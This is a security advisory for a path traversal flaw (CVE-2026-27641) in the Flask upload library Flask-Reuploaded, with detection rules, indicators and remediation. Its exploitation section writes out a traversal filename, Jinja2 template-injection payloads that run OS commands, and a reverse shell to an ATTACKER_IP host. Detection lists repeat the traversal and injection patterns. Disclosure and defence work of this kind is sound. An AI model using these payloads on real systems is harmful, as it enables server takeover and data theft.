Product Overview – Flask-Reuploaded
Flask-Reuploaded is a Python extension for the Flask web framework that simplifies file upload handling. It is commonly used in web applications that allow users to upload images, documents, or other files. The package provides validation controls, upload destinations, and integration helpers for Flask apps.
In CVE-2026-27641, a critical flaw was identified in how Flask-Reuploaded validates and stores uploaded file paths. Improper path sanitization allows attackers to traverse directories and write files outside the intended upload directory. This arbitrary file write can be chained into Server-Side Template Injection (SSTI), ultimately leading to full Remote Code Execution (RCE) on the affected server.
CVE-2026-27641 – Detailed Security Advisory
| Field | Details |
|---|---|
| CVE ID | CVE-2026-27641 |
| Product | Flask-Reuploaded |
| Vulnerability Type | Path Traversal leading to Arbitrary File Write and RCE |
| Attack Vector | Remote (HTTP upload endpoint) |
| Attack Complexity | Low |
| Privileges Required | None (if upload is public) |
| User Interaction | Not required |
| Impact | Full system compromise |
| CVSS Score | 9.8 (Critical) |
| Severity | Critical |
| Exploitability | High |
| Exploit Availability | Public proof-of-concept available (for educational and testing purposes) |
| Affected Component | File upload handling logic |
| Patched Version | Latest secure release |
| Official Patch Link | https://github.com/maxcountryman/flask-reuploaded/releases |
Technical Summary
The vulnerability exists due to improper validation of uploaded filenames. Specifically:
- The application trusts user-controlled filenames.
- Directory traversal sequences such as
../are not properly sanitized. - The upload destination path is constructed using unsafe joins.
- Attackers can escape the intended upload folder.
Once arbitrary file write is achieved, attackers can:
- Overwrite existing application files.
- Drop malicious
.pyfiles. - Write malicious Jinja2 template files.
- Modify template directories to introduce SSTI payloads.
If the application uses dynamic template rendering (e.g., render_template()), this enables execution of arbitrary Python code.
How This Can Be Exploited
Step 1 – Path Traversal Upload
An attacker uploads a malicious file with a crafted filename:
../../templates/malicious.html
If the backend performs something similar to:
file.save(os.path.join(upload_folder, filename))
Without sanitization, the file is written outside the upload directory.
Step 2 – Template Injection
The attacker writes a malicious Jinja2 template file containing:
{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}
If the application later renders this template:
render_template("malicious.html")
It results in OS command execution.
Step 3 – Full RCE
The attacker can execute arbitrary system commands:
{{ config.__class__.__init__.__globals__['os'].popen('whoami').read() }}
Or spawn reverse shells:
{{ config.__class__.__init__.__globals__['os'].system('bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"') }}
At this stage, the server is fully compromised.
MITRE ATT&CK Mapping
| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Exploit Public-Facing Application | T1190 |
| Persistence | Server Software Component | T1505 |
| Execution | Command and Scripting Interpreter | T1059 |
| Defense Evasion | Modify Application Files | T1565 |
| Privilege Escalation | Exploitation for Privilege Escalation | T1068 |
Indicators of Compromise (IoCs)
- Unexpected files inside:
/templates/- Application root directory
- Static directories
- Files containing suspicious Jinja2 expressions:
__globals__popensubprocess
- Unusual HTTP POST requests to upload endpoints.
- Web server logs showing:
../in filename parameters- Encoded traversal sequences (
..%2f)
- Unexpected outbound traffic from web server.
Detection & Monitoring Guidance
Log Sources to Monitor
- Web server access logs (Nginx / Apache)
- Flask application logs
- Reverse proxy logs
- WAF logs
- EDR process creation logs
- File integrity monitoring logs
- Linux auditd logs
Suspicious Payload Patterns
Directory Traversal Detection
../
..%2f
..%5c
%2e%2e%2f
SSTI Payload Detection
{{ config
__globals__
popen(
subprocess
system(
SIEM Detection Rule
Rule: Detect Path Traversal in Upload Endpoint
- IF:
- HTTP Method = POST
- URL contains
/upload - Request body contains
../
- THEN:
- Alert as High Severity
File Integrity Monitoring Rule
Monitor changes to:
/app/templates/
/app/*.py
Alert on newly created .html or .py files.
Proof of Concept (PoC) Status
Public PoC demonstrates:
- Uploading a malicious template file outside the intended upload directory.
- Triggering template rendering.
- Executing arbitrary OS commands.
- Gaining reverse shell.
Exploit requires only HTTP access to file upload functionality.
No authentication required if upload endpoint is exposed.
Root Cause
- Improper path normalization
- Unsafe use of
os.path.join() - Lack of filename sanitization
- Failure to enforce upload directory boundaries
- Trusting user-controlled input in filesystem operations
Business Impact
If exploited, this vulnerability allows:
- Complete server takeover
- Data theft
- Credential harvesting
- Lateral movement
- Malware deployment
- Ransomware staging
- Source code exposure
- Database compromise
In production environments, impact is catastrophic.
Remediation & Mitigation
Immediate Actions
- Upgrade to patched Flask-Reuploaded version immediately.
- Rotate credentials stored on affected servers.
- Review server logs for exploitation attempts.
- Rebuild server from clean image if compromise suspected.
Secure Coding Fix
Use safe filename handling:
from werkzeug.utils import secure_filename
filename = secure_filename(file.filename)
Ensure strict path enforcement:
real_path = os.path.realpath(os.path.join(upload_folder, filename))
if not real_path.startswith(upload_folder):
raise Exception("Invalid path")
Disable rendering of user-controlled templates.
Official Patch
The vulnerability has been addressed in the official Flask-Reuploaded repository.
Upgrade to the latest secure version from the project’s official release page.
https://github.com/maxcountryman/flask-reuploaded/releases
Hardening Recommendations
- Disable template editing from user uploads.
- Store uploads outside application root.
- Run application with non-root user.
- Use AppArmor / SELinux.
- Implement WAF rules for traversal patterns.
- Enable strict file permissions.
- Deploy runtime application self-protection (RASP).
